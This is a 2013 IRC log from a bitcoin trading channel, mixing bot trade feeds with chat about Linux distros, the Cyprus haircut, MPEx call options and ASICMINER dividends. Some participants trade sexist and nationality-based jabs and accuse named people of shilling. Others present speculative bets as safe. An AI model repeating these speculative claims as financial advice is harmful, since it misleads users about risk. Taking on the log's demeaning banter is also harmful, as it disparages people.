[B.YABMC] 1 @ 0.015 BTC [-] Mar 27 00:54:15 [HAVELOCK] [VTX] 10 @ 0.68 = 6.8 BTC [-] Mar 27 00:55:17 [BTCTC] [MININGCO.ETF] 1 @ 0.6499 BTC [+] Mar 27 00:56:45 ;;rate diana_coman 1 Mar 27 00:56:47 Rating entry successful. Your rating of 1 for user diana_coman has been recorded. Mar 27 00:57:15 [HAVELOCK] [VTX] 36 @ 0.68 = 24.48 BTC [-] Mar 27 00:57:16 no girls on internets Mar 27 00:57:40 shh Mar 27 00:57:42 you sexist Mar 27 00:57:49 haha Mar 27 01:02:22 [BTCTC] [PAJKA.BOND] 1 @ 0.1089 BTC [+] Mar 27 01:05:15 [HAVELOCK] [VTX] 4 @ 0.68 = 2.72 BTC [-] Mar 27 01:06:03 wow, I think gmaxwell is a shill for bfl Mar 27 01:10:15 wow, I think Diablo-D3 is a shill for Ubuntu Mar 27 01:10:33 Azelphur: I heard they're ending the ubuntu distro sometime in the next year or two Mar 27 01:10:36 this makes me happy Mar 27 01:10:49 I didn't hear this, this makes me sad, especially as I'm currently wearing my Ubuntu tshirt Mar 27 01:11:18 yeah, they wanna focus on being a hardware… whatever it is they think they're doing Mar 27 01:11:34 [BTCTC] [ASICMINER-PT] 1 @ 0.6501 BTC [-] Mar 27 01:11:35 fun Mar 27 01:11:36 [BTCTC] [ASICMINER-PT] 100 @ 0.65 = 65 BTC [-] Mar 27 01:15:12 lmao Mar 27 01:15:22 more like, unity failed so no money so fuck this Mar 27 01:17:04 [BTCTC] [BTC-BOND] 3 @ 0.009989 = 0.03 BTC [-] Mar 27 01:18:08 [BTCTC] [BTC-BOND] 7 @ 0.00999 = 0.0699 BTC [+] Mar 27 01:19:04 btw, someone asked how many customers coinbr has Mar 27 01:19:15 it's between 50-100 active accounts Mar 27 01:19:20 nice! Mar 27 01:19:39 but whole coinbr is bigger that bitfinsex by a healthy margin Mar 27 01:20:08 huh, they are really ending ubuntu? Mar 27 01:20:35 i parsed "bitfinsex" incorrectly when scanning this scrollback.. Mar 27 01:21:07 [BTCTC] [ASICMINER-PT] 60 @ 0.7 = 42 BTC [+] Mar 27 01:21:26 Diablo-D3 is right gmax is a bfl shill Mar 27 01:21:43 dub: er, since when did you agree with me on anything? Mar 27 01:22:01 I've been banned from -mining for >6 months for suggesting their shipping schedule may not be accurate Mar 27 01:22:17 heh Mar 27 01:22:24 he kickbanned me then +q'ed me Mar 27 01:22:39 [MPEX] [S.MPOE] 5650 @ 0.00063879 = 3.6092 BTC [+] Mar 27 01:23:24 he's just an idiot. Mar 27 01:23:32 shills make money. Mar 27 01:23:34 that too Mar 27 01:23:51 presumably he is getting paid in blowjobs from Luke-Jr Mar 27 01:24:03 or some other bfl shill PT Mar 27 01:24:44 yeah this is stupid Mar 27 01:24:52 Im just going to stand back and let the whole thing collapse, really Mar 27 01:27:38 people sometimes just refuse to learn Mar 27 01:28:05 i never understood the need for ubuntu *cough debian* anyway.. Mar 27 01:28:19 KRS1 sorta like mpex gui Mar 27 01:28:29 Ive been using debian for like 15 years Mar 27 01:28:30 why change now Mar 27 01:28:38 glad to hear that..one less linux distro Mar 27 01:29:07 debian is good for when you want to actually use linux and not just be a douche Mar 27 01:29:14 dub: exactly Mar 27 01:29:21 although I dont like how they're discussing moving to systemd Mar 27 01:29:28 if that happens, I think I may jump to alpine =/ Mar 27 01:29:50 at some point most people outgrow douchery and realise debian is jesus Mar 27 01:30:21 unless they are freebsd douches who will always remain so Mar 27 01:30:50 lol sounds like someone didnt ever grow out of their training OS Mar 27 01:31:02 er pants Mar 27 01:31:25 pray tell what is your preffered *nix KRS1? Mar 27 01:31:29 inb4 slackware Mar 27 01:32:21 why tell you so i can be another douche Mar 27 01:38:12 sweet, we haven't had a holy war here in like a month. Mar 27 01:38:36 Tiberius? Mar 27 01:39:35 tiberius isn't war... although produced quite a flood tho Mar 27 01:40:40 so when bitcoin stops rising there will be credit (among other things) crunch Mar 27 01:40:46 holy war = "apple is better than windoze" "no slackware is better than sarge" Mar 27 01:40:47 or was it other way round? Mar 27 01:41:14 gäntoo rulez Mar 27 01:41:41 wat Mar 27 01:42:21 gentoo is the slamming your cock and balls in a door of linux Mar 27 01:42:32 yeah feels so gooood Mar 27 01:42:56 especially the hardened variety Mar 27 01:43:44 fuck...debian is the purest linux there really is Mar 27 01:43:53 don't know about ubuntu...not a big fan Mar 27 01:43:59 but fuck yum and that bullshit Mar 27 01:44:00 debian is fine...but i have to compile newer stuff on it all the time anyway Mar 27 01:44:02 its apt-get Mar 27 01:44:23 to me it seems like they just reinvent the wheel in a lot of the others Mar 27 01:44:35 apt-get ftw Mar 27 01:44:36 or make things so niche that like one guy is like "this is perfect!" Mar 27 01:45:04 but srsly, debian works, its simple and you can make it do anything...just how i like my women Mar 27 01:45:11 oh, wasn't debian that fucked the keys? cuz they know better than upstream? Mar 27 01:45:22 not sure Mar 27 01:45:29 but debian is usually as upstream as you can get Mar 27 01:45:36 besides linux kernel Mar 27 01:46:11 not saying the other packages may not be off, but debian can run almost anything Mar 27 01:46:56 gentoo is the slamming your cock and balls in a door of linux :) Mar 27 01:47:40 i srsly don't get why not just fork debian and make apt-get do what you want...why create yum and rpl etc Mar 27 01:47:53 its like saying i'll start a new distro but i don't like cp Mar 27 01:48:05 i'm gonna make mine called rad or whatever Mar 27 01:48:13 its simpler to think of it like this: Some people use linux as a tool to accomplish their work, som use it because they are tools who don't have a job. Mar 27 01:48:15 trolling multiple people with very little effort Mar 27 01:50:31 if you are very good at linux...you don't have a job because you don't want one, or you are so annoying that no one can possibly work with you...at least in the US Mar 27 01:50:31 well, in the beginning there was One Unix....errr no... there was actually sysv and bsd... Mar 27 01:50:40 yeah Mar 27 01:50:49 although sysV was first Mar 27 01:50:59 so you could say that in the beginning there was one Mar 27 01:51:38 well.. and that one was horrible hack for decommissioned microcomputer Mar 27 01:51:45 lol ywH Mar 27 01:51:48 so everyone was like we must fix it Mar 27 01:51:48 YEAH Mar 27 01:52:01 yep...and i believe it was private...or was that the one before Mar 27 01:52:21 and wasn't it for DEC hardware? Mar 27 01:52:54 Bugpowder: just caught up. 80% haircut for "rich" Cypriots (a minority that won't march in the streets) and foreigners (EU/Russian retirees who saved all their lives but don't vote in Cyprus)... oh and Russian mafia, apparently Mar 27 01:53:39 Easy out for politicians. And they wonder why suddenly normal citizens look at something like Bitcoin and say "Tell me more" Mar 27 01:53:43 wait what ?! it ws 20% Mar 27 01:53:45 now it's 80% ? Mar 27 01:53:50 russian mafia = russian state enterprises. medvedev said loudly Mar 27 01:54:26 yeah. Mar 27 01:54:27 Cyprus Finance Minister: Uninsured Laiki Depositors Could Face 80% Haircut http://online.wsj.com/article/BT-CO-20130326-712516.html Mar 27 01:54:51 Bugpowder was wondering why no one replied way above. Mar 27 01:55:06 past this point it is irresponsible to keep wealth in banks/fiat. Mar 27 01:55:14 even if not 80% , it will be paid years later.. so effectively 80% can be Mar 27 01:55:15 you're way better off in ltc. Mar 27 01:57:19 Like the Cyprus "solution", Florida has something similar for foreigners who buy retirement homes: out-of-state owners of Florida property apparently pay higher property taxes than their neighbours. Because they can't vote. Mar 27 01:59:36 neway im off. take care all **** BEGIN LOGGING AT Wed Mar 27 08:09:31 2013 Mar 27 08:10:29 ;;ticker Mar 27 08:10:34 BTCUSD ticker | Best bid: 83.74544, Best ask: 84.20000, Bid-ask spread: 0.45456, Last trade: 84.20000, 24 hour volume: 67420.00585510, 24 hour low: 75.00000, 24 hour high: 83.00001, 24 hour vwap: 78.64965 Mar 27 08:10:37 o wow. Mar 27 08:11:10 yeah, nice to wake up to that Mar 27 08:11:25 Moving up... we better reach 100... Mar 27 08:11:27 [MPEX] [O.BTCUSD.C750T] 1 @ 0.09644283 BTC [+] Mar 27 08:11:31 gox lag is 2 mins Mar 27 08:11:33 its active now Mar 27 08:11:46 100 seems quite likely tbh Mar 27 08:11:56 [MPEX] [O.BTCUSD.C730T] 1 @ 0.11551977 BTC [+] Mar 27 08:11:57 yeah 100 is almost a sure thing now :/ Mar 27 08:12:01 ;;asks 100 Mar 27 08:12:01 It has a nice sounding to it. Mar 27 08:12:03 There are currently 20890.923 bitcoins offered at or under 100.0 USD, worth 1975762.01088 USD in total. | Data vintage: 0.0018 seconds Mar 27 08:12:08 ;;asks 99.999 Mar 27 08:12:09 There are currently 19647.357 bitcoins offered at or under 99.999 USD, worth 1851405.41114 USD in total. | Data vintage: 4.9117 seconds Mar 27 08:12:10 There's just something to it. Mar 27 08:12:19 yeah it's gone Mar 27 08:12:19 Like a 100 USD bill Mar 27 08:12:22 2 million fiat, lol Mar 27 08:12:24 20k btc = nothing. Mar 27 08:12:36 what happened to ASICMINER's other 6TH? wasn't it supposed to be 12 TH in the first batch? Mar 27 08:12:39 order book on gox with bids showing is like 8 million fiat Mar 27 08:12:54 toffoo we dont know, but yes Mar 27 08:13:11 they have had some issues but are not clear Mar 27 08:13:15 toffoo the worst case scenario is that their chips keep blowing up Mar 27 08:13:17 what they are :? Mar 27 08:13:20 and they're already using batch 2 chips. Mar 27 08:13:26 otherwise, mystery. Mar 27 08:13:40 tehy dont have batch 2 chips yet, but they could ahve fucked 50% of batch one Mar 27 08:13:40 weird how they haven't addressed this pretty critical question Mar 27 08:13:56 they dont need more funding so why do they care? Mar 27 08:14:02 [MPEX] [S.DICE] 2409 @ 0.00448 = 10.7923 BTC [-] Mar 27 08:14:07 they dont care price of stock Mar 27 08:14:17 in it for the dividends Mar 27 08:14:19 toffoo what can they say ? Mar 27 08:14:33 originally their gear was going to be sent to upstanding community members for review Mar 27 08:14:39 ;;ticker Mar 27 08:14:40 it's never happened and quietly dropped. Mar 27 08:14:40 BTCUSD ticker | Best bid: 83.90001, Best ask: 83.95000, Bid-ask spread: 0.04999, Last trade: 83.95000, 24 hour volume: 69002.42552111, 24 hour low: 75.07009, 24 hour high: 84.39000, 24 hour vwap: 78.78080 Mar 27 08:14:47 the only logical conclusion is there's something wrong with it. Mar 27 08:15:03 well I hate to jump to uninformed conclusions Mar 27 08:15:24 I thought it might have been mentioned in that monster forum thread, Mar 27 08:15:32 this is not jumping to conclusions. this is the correct assumption process in business. Mar 27 08:15:34 but I figured I'd ask here before wading thru it Mar 27 08:15:43 [MPEX] [O.BTCUSD.C750T] 1 @ 0.0996075 BTC [+] Mar 27 08:15:49 somebody owes but doesn't pay the assumption is they're insolvent. Mar 27 08:15:52 that sort of stuff. Mar 27 08:17:20 [BTCTC] [ASICMINER-PT] 1 @ 0.699994 BTC [-] Mar 27 08:17:55 [BTCTC] [ASICMINER-PT] 2 @ 0.699995 = 1.4 BTC [+] Mar 27 08:19:02 toffee friedcat has said networking problems Mar 27 08:19:14 toffoo* Mar 27 08:21:53 [MPEX] [S.MPOE] 15000 @ 0.00062582 = 9.3873 BTC [+] Mar 27 08:21:56 where did he say that? Mar 27 08:22:15 in the thread. Mar 27 08:22:20 I thought the networking problems when there was like 3-4 TH online Mar 27 08:22:28 that's it. Mar 27 08:22:34 I don't think I've ever seen more than about 6 TH hashing Mar 27 08:22:52 sounds about right. Mar 27 08:24:54 [MPEX] [O.BTCUSD.C730T] 1 @ 0.11289001 BTC [-] Mar 27 08:25:15 6.5TH lately Mar 27 08:25:32 and i saw it spike at 6.75 once Mar 27 08:25:36 thats about it Mar 27 08:27:03 [MPEX] [O.BTCUSD.C750T] 1 @ 0.09385556 BTC [-] Mar 27 08:27:28 ;;nethash Mar 27 08:27:29 51184.1173664 Mar 27 08:27:35 ;;estimate Mar 27 08:27:36 Next difficulty estimate | 6742223.56791 based on data since last change | 7150229.48926 based on data for last three days Mar 27 08:29:35 ;;ticker Mar 27 08:29:36 BTCUSD ticker | Best bid: 82.51000, Best ask: 83.95000, Bid-ask spread: 1.44000, Last trade: 83.95000, 24 hour volume: 69655.64712248, 24 hour low: 75.07101, 24 hour high: 84.39000, 24 hour vwap: 78.82830 Mar 27 08:34:24 [BTCTC] [ASICMINER-PT] 10 @ 0.699995 = 7 BTC [+] Mar 27 08:36:38 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.2930763 = 293.0763 BTC [+] Mar 27 08:36:40 [MPEX] [O.BTCUSD.C630T] 1000 @ 0.26346639 = 263.4664 BTC [+] Mar 27 08:36:44 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.2344069 = 234.4069 BTC [+] Mar 27 08:36:46 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.20614959 = 206.1496 BTC [+] Mar 27 08:36:51 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.17899591 = 178.9959 BTC [+] Mar 27 08:36:53 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.15327667 = 153.2767 BTC [+] Mar 27 08:36:56 [MPEX] [O.BTCUSD.C730T] 1 @ 0.11738822 BTC [+] Mar 27 08:36:57 [MPEX] [O.BTCUSD.C730T] 999 @ 0.12932122 = 129.1919 BTC [+] Mar 27 08:37:00 [MPEX] [O.BTCUSD.C750T] 1 @ 0.09803797 BTC [+] Mar 27 08:37:02 [MPEX] [O.BTCUSD.C750T] 999 @ 0.10742235 = 107.3149 BTC [+] Mar 27 08:37:35 time to buy calls Mar 27 08:39:44 [MPEX] [O.BTCUSD.C730T] 1 @ 0.11786429 BTC [-] Mar 27 08:39:46 [MPEX] [O.BTCUSD.C750T] 1 @ 0.09845581 BTC [-] Mar 27 08:39:48 [MPEX] [O.BTCUSD.C750T] 1 @ 0.13 BTC [+] Mar 27 08:40:00 [BTCTC] [ASICMINER-PT] 7 @ 0.7 = 4.9 BTC [+] Mar 27 08:40:20 lots of em Mar 27 08:40:39 hmm, more calls to buy Mar 27 08:41:05 ;;bids 78.72 Mar 27 08:41:08 There are currently 3087.7011 bitcoins demanded at or over 78.72 USD, worth 247621.614442 USD in total. | Data vintage: 0.0070 seconds Mar 27 08:41:17 ;;asks 85 Mar 27 08:41:17 There are currently 2434.4015 bitcoins offered at or under 85.0 USD, worth 205945.63073 USD in total. | Data vintage: 8.3875 seconds Mar 27 08:41:25 ;;asks 100 Mar 27 08:41:25 There are currently 21113.042 bitcoins offered at or under 100.0 USD, worth 1990189.832 USD in total. | Data vintage: 16.7081 seconds Mar 27 08:42:05 Sounds good to me Mar 27 08:42:23 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.29329496 = 293.295 BTC [+] Mar 27 08:42:25 [MPEX] [O.BTCUSD.C630T] 1000 @ 0.26368397 = 263.684 BTC [+] Mar 27 08:42:28 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.23461956 = 234.6196 BTC [+] Mar 27 08:42:30 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.20635286 = 206.3529 BTC [+] Mar 27 08:42:38 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.17918507 = 179.1851 BTC [+] Mar 27 08:42:40 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.1534473 = 153.4473 BTC [+] Mar 27 08:42:41 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.12946978 = 129.4698 BTC [+] Mar 27 08:42:42 [MPEX] [O.BTCUSD.C750T] 1 @ 0.09599945 BTC [-] Mar 27 08:42:53 [MPEX] [O.BTCUSD.C750T] 999 @ 0.10754662 = 107.4391 BTC [+] Mar 27 08:43:18 [MPEX] [O.BTCUSD.C750T] 1 @ 0.10754662 BTC [+] Mar 27 08:47:54 [MPEX] [O.BTCUSD.C750T] 1 @ 0.09599945 BTC [-] Mar 27 08:51:08 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.29351269 = 293.5127 BTC [+] Mar 27 08:51:10 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.10766303 = 107.663 BTC [+] Mar 27 08:51:12 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.12961161 = 129.6116 BTC [+] Mar 27 08:51:14 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.15361245 = 153.6125 BTC [+] Mar 27 08:51:15 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.17936998 = 179.37 BTC [+] Mar 27 08:51:25 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.20655301 = 206.553 BTC [+] Mar 27 08:51:27 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.23483005 = 234.8301 BTC [+] Mar 27 08:51:28 [MPEX] [O.BTCUSD.C630T] 1000 @ 0.26390011 = 263.9001 BTC [+] Mar 27 08:53:29 mircea_popescu... I think there's demand for more calls Mar 27 08:53:44 :) Mar 27 08:54:03 expecting moon shot well over 100 maybe Mar 27 08:54:07 holy hell what happened here Mar 27 08:54:20 but these options end when? Mar 27 08:54:28 too soon Mar 27 08:54:36 but they have less of a premium too Mar 27 08:54:43 the closer to expiration date Mar 27 08:54:52 i know but still Mar 27 08:54:55 They expire on the 29th Mar 27 08:55:06 expire friday Mar 27 08:55:19 then again traditionally options have been trading like crazy past few days of each month. Mar 27 08:55:25 btc people just don't like the long term Mar 27 08:55:36 hmm, well if they expect 100 soon very soon then its a good deal Mar 27 08:55:38 where long is anything over a week, in the sense tuesday to saturday is a week Mar 27 08:56:04 they're in the money if average moves like to 82-85 USD per BTC Mar 27 08:56:10 within 2 days Mar 27 08:56:17 then the more the better Mar 27 08:56:29 pretty safe bet Mar 27 08:56:31 if price doesn't move it's even/small loss Mar 27 08:56:41 if price go down it could hurt tho Mar 27 08:56:42 ;;calc 63 / (1-.264) Mar 27 08:56:43 85.597826087 Mar 27 08:56:49 the 63 ones need 85.6 like Mar 27 08:57:01 meh 5000 btc seems worth the risk here Mar 27 08:57:15 ;;calc 75 / (1-.107) Mar 27 08:57:15 83.9865621501 Mar 27 08:57:24 75 needs 83.98 Mar 27 08:57:29 yeah Mar 27 08:57:40 so about there, 84-85 Mar 27 08:57:48 If price makes a sudden drop, executing them is always an option to cut losses. Mar 27 08:57:58 before average moves anyway Mar 27 08:58:04 Still... very risky Mar 27 08:58:04 last week i was excited about goiing over 300k notional which was like 20mn Mar 27 08:58:07 i highly doubt we will see a drop Mar 27 08:58:12 options are usually in favor of the bot Mar 27 08:58:13 now solidly over 400k, which is like 35mn Mar 27 08:59:42 bitcoinity wtf? Mar 27 09:00:07 the grandma of the cat in tyhe looney toons was tossing money into a fire? Mar 27 09:00:22 anyone else see that? Mar 27 09:00:35 the what ? Mar 27 09:00:59 a cartoon was showed on the page Mar 27 09:01:00 MPEx options bot ran out of funds it seems Mar 27 09:01:03 for like 5 seconds Mar 27 09:01:14 Well the asks/bids aren't for 1000 everywhere Mar 27 09:01:31 Mtgox trading engine lag: 34.80s Mar 27 09:01:41 bitcoinity is basically an engine of displaying how sucky mtgox is Mar 27 09:02:02 Namworld prolly ran out of options. Mar 27 09:02:06 but there was a cartoon of a lady burning usd when we jumped about $2 Mar 27 09:02:14 lasted about 5 seconds Mar 27 09:03:07 [BTCTC] [BTC-BOND] 10 @ 0.00999 = 0.0999 BTC [+] Mar 27 09:03:36 Well one last round of options to grab and it's gone Mar 27 09:05:46 ... Mar 27 09:05:51 10k in BTC Mar 27 09:06:18 tiberslov is nigerian Mar 27 09:06:21 [MPEX] [O.BTCUSD.C610T] 987 @ 0.29418438 = 290.36 BTC [+] Mar 27 09:06:22 [MPEX] [O.BTCUSD.C690T] 995 @ 0.18001586 = 179.1158 BTC [+] Mar 27 09:06:24 [MPEX] [O.BTCUSD.C710T] 995 @ 0.15422494 = 153.4538 BTC [+] Mar 27 09:06:33 [MPEX] [O.BTCUSD.C730T] 955 @ 0.13017969 = 124.3216 BTC [+] Mar 27 09:06:33 [MPEX] [O.BTCUSD.C750T] 689 @ 0.10817751 = 74.5343 BTC [+] Mar 27 09:06:39 MPOE shares trade an average of 700k daily... Mar 27 09:07:14 Why? Mar 27 09:07:29 Why do you even claim that? Mar 27 09:08:00 What does that changes? Mar 27 09:09:07 They're around or on the forum everywhere =/ Mar 27 09:09:36 It's people with thousands of BTCs >.> Mar 27 09:09:44 No one with 1-2 BTC is on MPEx Mar 27 09:10:41 Brokers hardly represent a fraction of trades Mar 27 09:10:58 and SatoshiDice owner could certainly vouch funds he raised are actual... Mar 27 09:11:06 there's large traders around Mar 27 09:13:45 The large traders are hardly standing around all day in IRC. They don't even know about it. Mar 27 09:14:50 I have funds loaned to me. The big people are not on bitcointalk nor on IRC. Mar 27 09:15:10 I've never talked to them before receiving the BTC or anything. Mar 27 09:15:54 For any purpose I wish. Personal loan. Mar 27 09:16:25 amusingly enough, large call buy put a top in the market. Mar 27 09:16:31 im curious if that holds any. Mar 27 09:17:25 actually, i wonder how many people are doing the "sell 1k btc at mtgox, buy 1k worth of calls on MPEx" hedging thing. Mar 27 09:17:36 I'm one of the trader on MPEx. A few of the 1000s calls were my transactions. Mar 27 09:17:48 Bugpowder was probably responsible for a few others Mar 27 09:18:09 Most are just not going to come in IRC... Mar 27 09:18:25 Namworld is this the tiberius kid going on ? Mar 27 09:19:06 Not sure why you'd expect that. The more funds people have, the less time they have to do things like have idle chatting in IRC. Mar 27 09:19:23 how do I buy shares on MPEx Mar 27 09:19:49 Get an account. They cost 30 BTC tho =/ Mar 27 09:20:07 or go through a broker Mar 27 09:21:14 Namworld: is there a no load way to purchase? Mar 27 09:21:27 define "no load"? Mar 27 09:21:50 Namworld: http://www.investopedia.com/terms/n/no-loadfund.asp Mar 27 09:22:14 No, not that I know of. Mar 27 09:22:31 Namworld: 30 is too high a price to pay Mar 27 09:23:13 tiberius, I'm not sure why being Romanian is such an issue, other than the added risk legal recourse is not really an option. Mar 27 09:25:19 With that logic, no romanian cannot be a scammer... Mar 27 09:25:31 unlord you missed that by abouyt a year Mar 27 09:25:40 there were two such distributyions in march and april 2012. Mar 27 09:25:53 shares sold for 9k satoshi (1mn) and 2.x k satoshi (4mn) Mar 27 09:26:10 also, http://polimedia.us/dtng/c/src/136436909249.png Mar 27 09:26:36 tiberslav is nigerian, he is juyst jelly of mps scamming skillz Mar 27 09:27:02 Well I must say he could stop posting NSFW links in an assets channel tho... Mar 27 09:27:13 Namworld have you clicked it ? Mar 27 09:27:23 nope Mar 27 09:27:29 the ONE TIME i actually post an on topic png Mar 27 09:27:37 mircea_popescu: what did I miss? Mar 27 09:27:51 unlord the no load thing. Mar 27 09:27:52 this really should be a sfw chan, if photo is not sfn just tell people Mar 27 09:28:04 mircea_popescu: well I wasn't really into BTC back then Mar 27 09:28:07 anyway, you can prolly talk to a broker pay whatever they charge as a % fee Mar 27 09:28:12 yeah I'm not sure it's due to options Mar 27 09:28:17 But anyway Mar 27 09:28:25 Namworld the coincidence is there. what's it due to we'll never know. Mar 27 09:29:07 and peeps, stop hating on pron. the solution is to get the girls naked at your office, not to remove pron form the workspace. Mar 27 09:29:15 http://bitcoin.clarkmoody.com/ Mar 27 09:29:37 looking at last few days on hourly setting, I'd say it looks like normal variation Mar 27 09:30:17 mircea_popescu: do shares have their own block-chain structure? Mar 27 09:30:28 unlord nope. Mar 27 09:30:58 Namworld the buying started around the peak (84.x) Mar 27 09:30:59 ltc back over .007 wow Mar 27 09:31:09 it's not been over 84 since. Mar 27 09:31:17 mircea_popescu: how do you demonstrate ownership? Mar 27 09:31:57 hmm price follows version number of bitcoin-qt ^^ Mar 27 09:32:00 on mpex ? you get gpg signed receipts for trades / acct statements Mar 27 09:32:05 do read the faq, it's informative. Mar 27 09:32:09 mircea_popescu: thanks Mar 27 09:32:25 Uglux haha that's a point. Mar 27 09:32:35 0.81 usd / btc here we go Mar 27 09:39:38 oh gox lag Mar 27 09:40:53 and looks like it's back up. Mar 27 09:41:10 net effect of like 25k notional ? 25 minutes worth of calm. Mar 27 09:41:18 scary shit. Mar 27 09:41:23 ;;asks 85 Mar 27 09:41:26 There are currently 1362.753 bitcoins offered at or under 85.0 USD, worth 115519.937878 USD in total. | Data vintage: 0.0013 seconds Mar 27 09:41:45 ath Mar 27 09:41:50 yup Mar 27 09:42:19 once btc gets to $300 or so im going to antartic Mar 27 09:42:28 a Mar 27 09:42:36 going to see some pengiunz! Mar 27 09:42:55 lol Mar 27 09:43:35 yeah, $300 is when my vacation fund gets = to anartica trip Mar 27 09:44:04 think satalite internetz will work down there? Mar 27 09:44:08 yea Mar 27 09:44:36 Chaang-Noi: http://en.wikipedia.org/wiki/Air_New_Zealand_Flight_901 Mar 27 09:44:41 well... i got meetings and shit. please don't break anything. Mar 27 09:44:53 lol meetings:) Mar 27 09:45:23 toffoo lol 30 eyar old sigh seeuing trip Mar 27 09:45:28 i want to land and play in the fucking snow Mar 27 09:45:33 ;;ticker Mar 27 09:45:33 BTCUSD ticker | Best bid: 83.96000, Best ask: 84.03865, Bid-ask spread: 0.07865, Last trade: 84.03865, 24 hour volume: 72686.59783658, 24 hour low: 75.20000, 24 hour high: 84.50000, 24 hour vwap: 79.09585 Mar 27 09:46:51 ;;asks 85 Mar 27 09:46:54 There are currently 1390.7625 bitcoins offered at or under 85.0 USD, worth 117911.596115 USD in total. | Data vintage: 0.0013 seconds Mar 27 09:46:55 ;;asks 89.9 Mar 27 09:46:56 There are currently 4093.0673 bitcoins offered at or under 89.9 USD, worth 355267.961904 USD in total. | Data vintage: 1.4320 seconds Mar 27 09:47:03 hm will there be an AM div today? Mar 27 09:47:13 there should be yes Mar 27 09:47:16 he said two this week Mar 27 09:47:19 we have 1 already Mar 27 09:47:21 Uglux yeah Mar 27 09:47:36 smallish one though Mar 27 09:48:19 since it's a) not a full week, and b) the first div to factor in all 400k shares. Mar 27 09:48:55 small for asicminer standards, a massive fucking div for wallstreet standards Mar 27 09:48:56 what is AM? Mar 27 09:49:00 asicminer Mar 27 09:49:04 ahh right Mar 27 09:49:22 Chaang-Noi: Sure... Mar 27 09:49:52 Chaang-Noi: they are not listed on mpex Mar 27 09:50:00 no one on wall street will give out .25% of thier company weekly Mar 27 09:50:05 I would rather like to see an update about that mysterious delayed +6TH, not hashing silently somewhere for someone else ^^ Mar 27 09:50:08 they are not listed Mar 27 09:50:17 however PTs on btct.co and bitfunder.com Mar 27 09:50:27 id like to see an update too Mar 27 09:50:28 Uglux it's unlikely to be hashing anywhere, cause of total networkoutput Mar 27 09:50:29 Chaang-Noi: how does one invest in them? Mar 27 09:50:37 however bear in mind.. most "wall street divs" are paid by stodgy companies, that have stable predictable earnings, so there is a premium paid for that so that the yield ends up being really low. Mar 27 09:50:46 but the pt at the linked sites or buy OTC on the tthreads i nthe forum at bitcointalk.org Mar 27 09:51:07 bgupta i hold one stock :) Mar 27 09:51:17 i hold gold and siklver for stability Mar 27 09:51:24 :) Mar 27 09:51:30 fuck wallstreet Mar 27 09:51:59 Chaang-Noi: I hold producing assets Mar 27 09:52:08 fuck inert metals Mar 27 09:52:29 i hold BTC/LTC/AM and then for my 10% shit hits the fan (gold and silver) Mar 27 09:52:59 I like KO Mar 27 09:53:00 im not trying to make money off of gold and silver, im using it as a protection from inflation or other crazyness like ww3 Mar 27 09:53:09 no idea what KO is Mar 27 09:53:18 if you dont hold it you dont own it Mar 27 09:53:48 tiberiusiv: they do? Mar 27 09:54:05 I guess you know my finances then Mar 27 09:54:06 corp gets taxed then you Mar 27 09:55:14 the percent might be small but remember that product price and share price increase with inflation Mar 27 09:55:26 So I'm not sure about inflation's impact Mar 27 09:56:21 tiberiusiv: okay, so that last statement is just wrong Mar 27 09:56:34 tiberiusiv: what are you using to measure inflation? Mar 27 09:56:52 lol, I thought you just told me it hadn't moved in 20 years? Mar 27 09:57:03 I assumed you knew the stock price then Mar 27 09:57:42 tiberius... do an average of the price Mar 27 09:57:43 http://static.seekingalpha.com/uploads/2010/2/26/saupload_02_26_ko_and_cce.jpg Mar 27 09:57:51 okay, sure, but I didn't buy in 1998 Mar 27 09:57:55 It was higher in the 90s but overall, long term, it grows Mar 27 09:58:38 I bought 12/23/2005 Mar 27 09:58:44 [BTCTC] [ASICMINER-PT] 6 @ 0.7 = 4.2 BTC [+] Mar 27 09:59:05 are you guys factoring in KO dividends being reinvested in buying more KO shares? Mar 27 09:59:10 bgupta: I am Mar 27 09:59:41 2.8% currently Mar 27 09:59:52 beats a savings account Mar 27 09:59:59 tiberiusiv: its expanding outside of the US at a crazy rate Mar 27 10:00:29 tiberiusiv: per capita consumption is still pretty low outside the US Mar 27 10:00:37 and there are a lot more people outside the US than inside Mar 27 10:01:02 [HAVELOCK] [VTX] 20 @ 0.6 = 12 BTC [+] Mar 27 10:01:03 yeah, which kinds of makes it safest, albeit near 0 return Mar 27 10:01:15 it beats holding fiats, compensates for inflation Mar 27 10:02:18 tiberiusiv: since I bought KO, I'm up 150% factoring in dividend reinvestments Mar 27 10:02:27 in 7 years Mar 27 10:02:40 that has to beat whatever nominal inflation we've had Mar 27 10:03:04 dude, did I insult you on here? Mar 27 10:03:17 is this an investment channel or a speculation channel? Mar 27 10:03:38 clearly Mar 27 10:03:41 thanks for yer time Mar 27 10:05:06 calm down kids. Mar 27 10:09:56 ;;ticker Mar 27 10:09:56 BTCUSD ticker | Best bid: 85.30000, Best ask: 85.33531, Bid-ask spread: 0.03531, Last trade: 85.30000, 24 hour volume: 74342.86175279, 24 hour low: 75.20000, 24 hour high: 85.30000, 24 hour vwap: 79.27222 Mar 27 10:10:02 so I am guessing next AM div will be just shy of 1 bitcent. Mar 27 10:10:36 says who Mar 27 10:11:13 you cant read chart Mar 27 10:11:37 standard deviation Mar 27 10:12:06 it means nothing Mar 27 10:12:30 close to zero Mar 27 10:13:14 can you stop pasting random charts Mar 27 10:13:17 thanks Mar 27 10:13:33 You infer the biggest things on every littlest changes/details in anything... what's up with that tiberius? Mar 27 10:13:59 tiberiusiv : http://t2.gstatic.com/images?q=tbn:ANd9GcR6lXlLwsYeUFIE9rStfgWpkUHkJNUKthG9nQJqVs5vAft1mjtE Mar 27 10:14:04 this one tells it all Mar 27 10:14:21 [BTCTC] [B.YABMC] 1 @ 0.01451 